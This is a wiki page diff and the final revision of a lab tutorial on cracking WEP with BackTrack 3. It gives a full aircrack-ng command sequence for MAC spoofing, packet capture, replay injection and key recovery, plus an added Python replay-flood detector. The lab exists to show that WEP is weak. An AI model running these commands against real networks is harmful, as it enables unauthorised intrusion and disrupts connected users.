Cracking WEP: Difference between revisions

From ITCwiki
No edit summary
m (test edit)
 
(20 intermediate revisions by one other user not shown)
Line 1: Line 1:
==Introduction==
:'''Introduction to Cracking WEP using BackTrack 3''' -- ''By L. Yang.''
In this lab, I will show you how to crack WEP using BackTrack 3. As you may know, WEP is a week security protocol that can be broken easily. There are dozens of articles about cracking WEP on the internet, so if this article doesn’t give you enough information, please do some online researches. The purpose of this lab is not encouraged you to be a hacker. I set this lab for educational purpose and to prove that WEP is a weak protocol that can be hacked easily.
In this article, I will create a wireless network lab and show you how to crack a WEP key using BackTrack 3. As you may know, WEP, Wired Equivalent Privacy, is a week security protocol that can be broken or crack easily. There are dozens of articles about cracking WEP on the internet. If this article doesn’t give you enough information, please do some online researches to find more information and detail. The purpose of this lab is not encourage you to be a hacker. I write this article for educational purpose, and to prove that WEP is a weak security protocol that can be hacked easily.
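Review bot: The new introduction paragraph still carries two wording errors from the old one: "WEP, Wired Equivalent Privacy, is a week security protocol" and "The purpose of this lab is not encourage you to be a hacker". Change "week" to "weak" (the last sentence of the same paragraph already spells it correctly) and "is not encourage" to "is not to encourage" before this revision is saved.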
==Hardware required==
 
===<h2 id="ly-proj" style="margin:3px; background:#cef2e0; font-size:110%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Hardware and Software Required</h2>===
Here is a list of equipment and hardware Requirement for this lab:
Here is a list of equipment and hardware Requirement for this lab:
*A wireless router - this could be any wireless router that supported WEP security encryption.
*A wireless router - this could be any wireless router that supported WEP security encryption.
*A BackTrack 3 Live CD  
*A BackTrack 3 Live CD  
*2 wireless adapters - one of them should be a compatible wireless adapter.
*2 wireless adapters - one of them should be a compatible wireless adapter.
*At least 2 PCs – In this lab, I used a desktop and a laptop. I installed the compatible wireless adapter card in the desktop, and the other laptop has a build-in wireless adapter.
*At least 2 PCs


==Setup the Wireless Lab==
===<h2 id="ly-proj" style="margin:3px; background:#cef2e0; font-size:110%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Preparing and Setting Up the Lab</h2>===
Below are the devices and hardware that I used in this lab along with the steps that I set them up for this lab.  
[[Image:topology.jpg|thumb|This is a picture of an idea for the network topology.|320px]]


*The wireless router: I used the Linksys wireless router (WRT54G) as the wireless access point. I setup the wireless router as shown in the snapshot bellow.
Below are the software and hardware I used in this lab. If you want to setup a lab like this, find the hardware and tools that are suitable for you. The picture on the right shows some information and idea of this network topology, and please be aware that the device names used in this lab are clearly addressed this picture


*The BackTrack 3 Live CD can be downloaded at http://www.backtrack-linux.org/downloads/. After the ISO image file has been downloaded, I burn it into a blank CD. If you would like instruction information of how to burn an ISO file to a CD/DVD, click on this link http://pcsupport.about.com/od/toolsofthetrade/ht/burnisofile.htm.
*I used the Linksys wireless router (WRT54G) as the wireless access point. I set it up as shown in the picture on the right.  


*Find a compatible wireless adapter from http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#compatibility. Find one and buy it or use the one that you have. The wireless adapter I used in this lab was the Alfa AWUS036H. I bought it online for $29.
*I download the BackTrack 3 Live CD image at http://www.backtrack-linux.org/downloads/. After the ISO image file has been downloaded, I burned the image into a blank CD. Instruction and information of how to burning a DVD/CD image to a DVD/CD can be found at http://pcsupport.about.com/od/toolsofthetrade/ht/burnisofile.htm.


*I inserted the Alfa AWUS036H wireless adapter into an USB port on my desktop and insert the BackTrack 3 Live CD into the CD ROM. I called this desktop the “Sniffing PC.” Boot the Sniffing PC from the CD.  
*I bought a wireless adapter online for $29. It was the Alfa AWUS036H. Compatibility wireless adapter can be found at http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#compatibility.  


*I made sure that the laptop (the Target PC) and the wireless router WRT54G (the Target AP) are configured and communicated with each other correctly.  
*The wireless adapter (Alfa AWUS036H) is connected through an USB port on my desktop PC and the BackTrack 3 Live CD is inserted into the CD ROM of the PC. I called this desktop PC the “Sniffing PC.


Here is the idea of the network topology of this lab and the screenshot of BackTrack 3.
*I made sure that the laptop (Target PC) and the wireless access point (the Target AP) are configured and communicated with each other correctly. I boot the Sniffing PC from the CD.  


[[File:bt00.jpg]]
{|
| [[Image:wrt54g.jpg|thumb|upright|Linksys wireless router(WRT54G)|202px]]
| [[Image:bt_screenshot.jpg|thumb|upright|A screenshot of BackTrack 3|230px]]
| [[Image:alfa.jpg|thumb|upright|Alfa AWUS036H|108px]]
|}


===<h2 id="ly-proj" style="margin:3px; background:#cef2e0; font-size:110%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Capturing Packets and Cracking the WEP</h2>===
[[Image:bt01.jpg|thumb|Selecting Wireless Assistant.|250px]]
Follow each section and step  below to check for a wireless adapter, capture data packets, and crack a WEP key using BackTrack 3.
====<h2 id="ly-proj" style="margin:3px; background:#cef2e0; font-size:90%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Checking Compatibility for an Adapter</h2>====
*In the Sniffing PC that is running BackTrack 3, select the '''K Menu''' icon located on the lower left hand corner. Then select '''Internet''', and then click on '''Wireless Assistant'''. When the '''Wireless Assistant''' window appear, you should see the target wireless access point that you want to hack. If you don’t have a compatible wireless adapter, it will prompt you an error massage says “No usable wireless device found.”
{|
| [[Image:bt02.jpg|thumb|upright|If the device is compatible|300px]]
| [[Image:bt03.jpg|thumb|upright|No usable wireless device found.|250px]]
|}


==Capturing packets and Cracking The WEP==
Take note some of the information such as the BSSID, the channel number, and the MAC address of the wireless access point that you want to crack. In this lab, the SSID is "TestingAP", channel 1, and the MAC address of 00:13:10:3C:51:5B. Close this window when you're done.
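Review bot: The rewritten "Take note" paragraph lists "the BSSID, the channel number, and the MAC address" as three separate items and then reports an SSID, while the later "Generating More Data Traffic" section states that "The BSSID is the MAC Address". Name each value once and consistently, for example "the SSID, the channel number, and the BSSID (MAC address)", so the values the reader writes down match the placeholders used in the later commands.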


Follow the steps bellow to capture packets and crack the WEP key.  
*Run a '''Konsole''' terminal program. To run a '''Konsole''' terminal, click on the black screen icon that is located on the lower left hand corner next to the '''K Menu''' icon.
 
*In the '''Konsole''' terminal, enter the command below to fine your device interface name. When the name of your device interface name is shown, take note of the device interface name. My device interface name is wlan0, as shown in the snapshot on the right.  
*On the Sniffing PC, select the small '''K''' icon located on the lower left hand corner. Select '''Internet''' and then click on '''Wireless Assistant'''.
  airmon-ng
   
[[Image:bt04.jpg|thumb|Results of the commands.|250px]]
[[File:bt01.jpg]]
The device interface name of my adapter is '''wlan0'''.
====<h2 id="ly-proj" style="margin:3px; background:#cef2e0; font-size:90%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Generating A Faked MAC Address</h2>====
The purpose of four commands below is to generate a faked MAC Address for your wireless adapter. These commands are optional if you don't need to change the MAC Address of your adapter.


When the '''Wireless Assistant''' window appear, you should see the target wireless access point you want to hack as show in the snapshot bellow. If you don’t have a compatible wireless adapter, it will prompt you an error massage says “No usable wireless device found.
*Enter the 4 commands below by typing each command and press Enter key.
airmon-ng stop ''<your device Interface>''
ifconfig ''<your device Interface>'' down
macchanger --mac 00:11:22:33:44:55 ''<your device Interface>''
airmon-ng start ''<your device Interface>''
These commands will change the MAC Address of your wireless adapter to a faked MAC Address of 00:11:22:33:44:55.


[[File:bt02.jpg]] [[File:br03.jpg]]
All the result of the previous commands should look like the screenshot on the right.


Take note some of the information such as the BSSID, the channel number, and the MAC address of the wireless access point that you want to crack. In this lab, the SSID is Testing AR on channel 1, and MAC address is 00:13:10:3C:51:5B. When you done, close the Wireless Assistant window.
====<h2 id="ly-proj" style="margin:3px; background:#cef2e0; font-size:90%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Capturing Data Packets</h2>====
[[Image:bt05.jpg|thumb|List of wireless access points around you.|250px]]
*Run the command below to see a list of the wireless access points around you.  
airodump-ng ''<your device Interface>''


*Run Shell – Konsole window. It is a small black screen icon located on the lower left hand corner next to the small K icon.  
*Once you see the Target AP you want to crack, press Ctrl+C to stop the scanning process. On the device list, you should see information such as the MAC Address (BSSID), power level, channel, encryption protocol, and the name (ESSID) of each access point. Write down these informations of the wireless access point you are going to hack. The snapshot on the right shows a list of the wireless access points around me. My Target AP is the highlighted in red.


*Enter the command bellow to find the adapter name. Once the name of your wireless adapter shown, take note of the interface name. Mine is wlan0.  
[[Image:bt06.jpg|thumb|Capturing packets traffic.|250px]]


airmon-ng
*Run the command below. This command will capture the data traffic between the Target AP and any its wireless clients.


*Enter the 4 command lines bellow by typing each command line and press Enter key.  
airodump-ng -c ''<channel>'' -w ''<file name>'' --bssid ''<BSSID> <your device interface>''
'''Note:''' The '''channel''', '''BSSID''', and y'''our device interface''' are the informations that you have noted earlier. The file name can be any name you want, but you have to remember it. Here I used '''capfile''' as the file name. The command I used and the output is shown on the snapshot on the right.


airmon-ng stop ''(your device Interface)''
====<h2 id="ly-proj" style="margin:3px; background:#cef2e0; font-size:90%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Generating More Data Traffic</h2>====
ifconfig ''(your device Interface)'' down
The following two commands are used to attack and force the access point (Target AP) to inject data packets to increase data traffic on the network. However, when you are running these two commands, any client computer that is connecting to the access point may lose connection or unable to connect to the Internet. Sometime you may have to power-cycle the access point in order to get connection again. Some time you may have difficulty using these commands, and you may get some massage says that attacking was not successful. If you have difficulty using these commands during the steps below, just ignore it and continue working on the next step. (This section may be optional for someone.)
macchanger --mac 00:11:22:33:44:55 ''(your device Interface)''
airmon-ng start ''(your device Interface)''


The purpose of these command lines is to change the MAC Address of your wireless adapter to a fake MAC Address: 00:11:22:33:44:55.
*Open a new '''Konsole''' terminal. '''Important:''' Make sure to leave the previous commands running without closing the first '''Konsole''' terminal window.


All the result of the command lines above should look like this.
[[Image:bt07.jpg|thumb|Increasing traffic snapshot.|250px]]
*Enter the following command.
aireplay-ng -1 0 -a ''<BSSID>'' -h 00:11:22:33:44:55 -e ''<ESSID> <your device interface>''.
The '''BSSID''' is the MAC Address and the '''ESSID''' is the name of the access point. In this lab, I entered '''00:13:10:3C:51:5B''' as the BSSID and '''TestingAP''' as the ESSID.  


[[File:br04.jpg]]
*Enter the following command; this command will force the access point to inject packets and speed the process.
aireplay-ng -3 -b ''<BSSID>'' -h 00:11:22:33:44:55 ''<your interface name>''


*Run the command bellow to pick up your device and see a list of the wireless access points around you. Once you see the Target AP, press Ctrl+C to stop scanning. On the list, you will see information such as the MAC Address (BBSSID), power level, channel, encryption protocol, and the name (ESSID) of each device. Write down this information of the wireless access point that you are going to hack for later use. The Target AP used in this lab is the highlighted in the snapshot bellow.
The snapshot on the right shows the commands output of mine. If one of these two commands are not working properly for you, you will have to wait longer.  


airmon-ng ''(your device Interface)''
*Assuming that my laptop (Target PC) is running and connecting to the Internet through Target AP. Now, I am gong use my laptop, the Target PC, to watch a movie on youtube.com to create traffic on the network.


[[File:br05.jpg]]
====<h2 id="ly-proj" style="margin:3px; background:#cef2e0; font-size:90%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Cracking the WEP Key</h2>====
[[Image:bt08.jpg|thumb|thumb|upright|WEP cracking command output: KEY FOUND!|592px]]
This is the final and the actual step to crack the WEP key.
'''NOTE:'''You should wait until enough data packets has been captured before you run the cracking command below; otherwise it will not success. Check to see if you have enough data packets capture in the firs Konsole terminal; it is the number right below the #data column. You should wait until this number goes above 10000 or 20000 in order to successfully crack the WEP key.


*Run the command line bellow.  
*When you are ready, open the third Konsole teminal without closing the first two Konsole terminals. You should keep them open and running.  


airodump-ng -c (channel) -w (file name) --bssid (bssid) (your device interface)
* Enter the following command.
aircrack-ng -b ''<BSSID> <file name-01.cap>''
'''NOTE''': The file name is the file name you enter earlier, and don't forgot to type the file name follow by -01.cap, or you will get an error massage.
At this point, you should get the WEP key if you have captured enough data packets. The snapshot on the right is this command output for this lab. It says that the key is found.


The channel, bssid, and your device interface is the information that you noted above. The file name can be any name you want. This command line will capture the packets traffic between the Target AP and any wireless client, and save them in a file. The command line I used and the output is shown bellow.


[[File:br06.jpg]]
===<h2 id="ly-proj" style="margin:3px; background:#cef2e0; font-size:110%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Conclusion</h2>===
 
Cracking WEP is fairly easy. Even though I have little knowledge about using Linux and networking, I can crack a WEP key easily. Using Linux to crack WEP is more common than using Windows. That is because most of the software and tools needed to crack WEP are build-in within Linux Operating system, and there are more Linux supported wireless adapters available. If you want to crack a WEP for any reason, you should build your own lab. You should be aware that hacking others' network is illegal, so please don't try. This article is written for educational purpose, so I built my own lab and cracked my own network. It takes me a few days to write this article, but the actual time that it takes me to crack the WEP key is less than five minutes. The following steps and commands are what I actually have done to crack the WEP key in this lab.
*Now, I will use the second laptop (the Target PC) to watch some movies online on abc.com to generate more traffic between the Target AP and Target PC. Remember that the more packets traffic to the wireless access point, the more data you can capture, and the more likely you will successfully crack the key faster.
*'''Step 1'''. I opened a Konsole terminal and typed the following commands.
*Open a new Shell – Konsole windows and enter the command line bellow.
airmon-ng
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -c 1 -w capfile --bssid 00:13:10:3C:51:5B wlan0
*'''Step 2'''. I opened another Konsole terminal and typed the following commands.
aireplay-ng -1 0 -a 00:13:10:3C:51:5B -e TestingAP wlan0
aireplay-ng -3 -b 00:13:10:3C:51:5B -h 00:11:22:33:44:55 wlan0
*'''Step 3'''. I opened another Konsole terminal and typed the following command.
aircrack-ng -b 00:13:10:3C:51:5B capfile-01.cap


aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (your device interface).
KEY FOUND!

Latest revision as of 00:30, 9 February 2011

Introduction to Cracking WEP using BackTrack 3 -- By L. Yang.

In this article, I will create a wireless network lab and show you how to crack a WEP key using BackTrack 3. As you may know, WEP (Wired Equivalent Privacy) is a weak security protocol that can be broken easily. There are dozens of articles about cracking WEP on the internet. If this article doesn’t give you enough information, please do some online research to find more detail. The purpose of this lab is not to encourage you to be a hacker. I wrote this article for educational purposes, and to prove that WEP is a weak security protocol that can be hacked easily.

Hardware and Software Required

Here is a list of the equipment and hardware required for this lab:

  • A wireless router - this could be any wireless router that supports WEP encryption.
  • A BackTrack 3 Live CD
  • 2 wireless adapters - one of them should be a compatible wireless adapter.
  • At least 2 PCs

Preparing and Setting Up the Lab

[Image: an idea of the network topology.]

Below are the software and hardware I used in this lab. If you want to set up a lab like this, find the hardware and tools that are suitable for you. The picture on the right gives an idea of the network topology; the device names used in this lab are labeled in that picture.

  • I used the Linksys wireless router (WRT54G) as the wireless access point. I set it up as shown in the picture on the right.
  • The wireless adapter (Alfa AWUS036H) is connected through a USB port on my desktop PC, and the BackTrack 3 Live CD is inserted into the CD-ROM drive of the PC. I called this desktop PC the “Sniffing PC.”
  • I made sure that the laptop (the Target PC) and the wireless access point (the Target AP) were configured and communicating with each other correctly. I booted the Sniffing PC from the CD.
[Images: Linksys wireless router (WRT54G); a screenshot of BackTrack 3; Alfa AWUS036H]

Capturing Packets and Cracking the WEP

[Image: Selecting Wireless Assistant.]

Follow each section and step below to check for a wireless adapter, capture data packets, and crack a WEP key using BackTrack 3.

Checking Compatibility for an Adapter

  • On the Sniffing PC that is running BackTrack 3, select the K Menu icon located in the lower left-hand corner. Then select Internet, and then click on Wireless Assistant. When the Wireless Assistant window appears, you should see the target wireless access point that you want to hack. If you don’t have a compatible wireless adapter, you will get an error message that says “No usable wireless device found.”
[Images: If the device is compatible; No usable wireless device found.]

Take note of some of the information, such as the BSSID, the channel number, and the MAC address of the wireless access point that you want to crack. In this lab, the SSID is "TestingAP", the channel is 1, and the MAC address is 00:13:10:3C:51:5B. Close this window when you're done.

  • Run a Konsole terminal program. To run a Konsole terminal, click on the black screen icon that is located on the lower left hand corner next to the K Menu icon.
  • In the Konsole terminal, enter the command below to find your device interface name. When the interface name is shown, take note of it. My device interface name is wlan0, as shown in the snapshot on the right.
airmon-ng
[Image: Results of the commands.]

The device interface name of my adapter is wlan0.

Generating A Faked MAC Address

The purpose of the four commands below is to set a fake MAC address on your wireless adapter. These commands are optional if you don't need to change the MAC address of your adapter.

  • Enter the 4 commands below, pressing the Enter key after each one.
airmon-ng stop <your device Interface>
ifconfig <your device Interface> down
macchanger --mac 00:11:22:33:44:55 <your device Interface>
airmon-ng start <your device Interface>

These commands will change the MAC address of your wireless adapter to the fake MAC address 00:11:22:33:44:55.

The results of the previous commands should look like the screenshot on the right.

Capturing Data Packets

[Image: List of wireless access points around you.]
  • Run the command below to see a list of the wireless access points around you.
airodump-ng <your device Interface>
  • Once you see the Target AP you want to crack, press Ctrl+C to stop the scanning process. In the device list, you should see information such as the MAC address (BSSID), power level, channel, encryption protocol, and name (ESSID) of each access point. Write down this information for the wireless access point you are going to hack. The snapshot on the right shows a list of the wireless access points around me. My Target AP is the one highlighted in red.
[Image: Capturing packets traffic.]
  • Run the command below. This command will capture the data traffic between the Target AP and any of its wireless clients.
airodump-ng -c <channel> -w <file name> --bssid <BSSID> <your device interface>

Note: The channel, BSSID, and your device interface are the values that you noted earlier. The file name can be any name you want, but you have to remember it. Here I used capfile as the file name. The command I used and its output are shown in the snapshot on the right.

Generating More Data Traffic

The following two commands are used to attack the access point (Target AP) and force it to inject data packets, which increases data traffic on the network. However, while you are running these two commands, any client computer that is connected to the access point may lose its connection or be unable to connect to the Internet. Sometimes you may have to power-cycle the access point in order to get the connection back. Sometimes you may have difficulty using these commands, and you may get a message saying that the attack was not successful. If you have difficulty using these commands during the steps below, just ignore it and continue with the next step. (This section may be optional for some readers.)

  • Open a new Konsole terminal. Important: Make sure to leave the previous commands running without closing the first Konsole terminal window.
[Image: Increasing traffic snapshot.]
  • Enter the following command.
aireplay-ng -1 0 -a <BSSID> -h 00:11:22:33:44:55 -e <ESSID> <your device interface>

The BSSID is the MAC Address and the ESSID is the name of the access point. In this lab, I entered 00:13:10:3C:51:5B as the BSSID and TestingAP as the ESSID.

  • Enter the following command; this command will force the access point to inject packets and speed up the process.
aireplay-ng -3 -b <BSSID> -h 00:11:22:33:44:55 <your interface name>

The snapshot on the right shows my command output. If one of these two commands is not working properly for you, you will have to wait longer.

  • Assuming that my laptop (the Target PC) is running and connected to the Internet through the Target AP, I am now going to use it to watch a movie on youtube.com to create traffic on the network.
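
A defender-side view of the traffic this section generates, added here as an example (it is not part of the original article or of aircrack-ng): a replayed frame is retransmitted unchanged, so one transmitter repeats the same 24-bit WEP IV far more often than ordinary 802.11 retries would. The `Frame` record, the thresholds, the client MAC and the sample frames are constructed for illustration; only the BSSID and the fake MAC come from this lab.

```python
"""Flag WEP replay floods in observed 802.11 data-frame records (added example)."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Frame:
    ts: float      # capture time, seconds
    src: str       # transmitter MAC address
    bssid: str     # access point MAC address
    length: int    # frame length in bytes
    iv: int        # 24-bit WEP IV read from the frame header


def find_replay_sources(frames, window=1.0, min_repeats=20):
    """Return {(bssid, src): {"iv", "length", "peak"}} for every transmitter
    that sent one identical (IV, length) frame at least `min_repeats` times
    within `window` seconds. Both thresholds are illustrative assumptions."""
    seen = defaultdict(list)  # (bssid, src, iv, length) -> timestamps
    for f in frames:
        seen[(f.bssid.lower(), f.src.lower(), f.iv, f.length)].append(f.ts)

    alerts = {}
    for (bssid, src, iv, length), stamps in seen.items():
        stamps.sort()
        lo = peak = 0
        for hi, t in enumerate(stamps):
            while t - stamps[lo] > window:   # slide the window start forward
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= min_repeats:
            best = alerts.get((bssid, src))
            if best is None or peak > best["peak"]:
                alerts[(bssid, src)] = {"iv": iv, "length": length, "peak": peak}
    return alerts


def build_sample():
    """Constructed sample: a normal client, a replaying station, and the AP."""
    bssid = "00:13:10:3C:51:5B"        # Target AP from this lab
    client = "00:AA:BB:CC:DD:01"       # constructed client MAC
    replayer = "00:11:22:33:44:55"     # fake MAC set earlier in this lab
    frames = []
    # Normal client traffic: a fresh IV for every frame, varied lengths.
    for i in range(50):
        frames.append(Frame(10.0 + i * 0.02, client, bssid,
                            120 + (i % 7) * 40, 0x000100 + i))
    # One legitimate frame retried 3 times (same IV): must not raise an alert.
    for r in range(3):
        frames.append(Frame(10.5 + r * 0.001, client, bssid, 300, 0x000200))
    # Replay flood: the same 68-byte frame and IV, 100 times in half a second.
    for i in range(100):
        frames.append(Frame(10.0 + i * 0.005, replayer, bssid, 68, 0x1A2B3C))
    # The AP answers each replay with a frame carrying a new IV.
    for i in range(100):
        frames.append(Frame(10.001 + i * 0.005, bssid, bssid, 68, 0x500000 + i))
    return frames


if __name__ == "__main__":
    for (bssid, src), hit in find_replay_sources(build_sample()).items():
        print(f"replay suspected: {src} -> {bssid} "
              f"IV=0x{hit['iv']:06x} len={hit['length']} "
              f"peak={hit['peak']} frames/window")
```

The retry case is why the threshold is well above 1: a handful of repeats of one IV is normal link-layer behaviour, a sustained run of them is not.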

Cracking the WEP Key

[Image: WEP cracking command output: KEY FOUND!]

This is the final step, the one that actually cracks the WEP key.

NOTE: You should wait until enough data packets have been captured before you run the cracking command below; otherwise it will not succeed. Check whether you have captured enough data packets in the first Konsole terminal; it is the number right below the #data column. You should wait until this number goes above 10000 or 20000 in order to successfully crack the WEP key.

  • When you are ready, open a third Konsole terminal without closing the first two Konsole terminals. You should keep them open and running.
  • Enter the following command.
aircrack-ng -b <BSSID> <file name-01.cap>

NOTE: The file name is the file name you entered earlier; don't forget to type the file name followed by -01.cap, or you will get an error message. At this point, you should get the WEP key if you have captured enough data packets. The snapshot on the right shows this command's output for this lab. It says that the key was found.


Conclusion

Cracking WEP is fairly easy. Even though I have little knowledge of Linux and networking, I can crack a WEP key easily. Using Linux to crack WEP is more common than using Windows. That is because most of the software and tools needed to crack WEP are built into the Linux operating system, and there are more Linux-supported wireless adapters available. If you want to crack WEP for any reason, you should build your own lab. You should be aware that hacking others' networks is illegal, so please don't try. This article is written for educational purposes, so I built my own lab and cracked my own network. It took me a few days to write this article, but the actual time it took me to crack the WEP key was less than five minutes. The following steps and commands are what I actually did to crack the WEP key in this lab.

  • Step 1. I opened a Konsole terminal and typed the following commands.
airmon-ng
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -c 1 -w capfile --bssid 00:13:10:3C:51:5B wlan0
  • Step 2. I opened another Konsole terminal and typed the following commands.
aireplay-ng -1 0 -a 00:13:10:3C:51:5B -e TestingAP wlan0
aireplay-ng -3 -b 00:13:10:3C:51:5B -h 00:11:22:33:44:55 wlan0
  • Step 3. I opened another Konsole terminal and typed the following command.
aircrack-ng -b 00:13:10:3C:51:5B capfile-01.cap

KEY FOUND!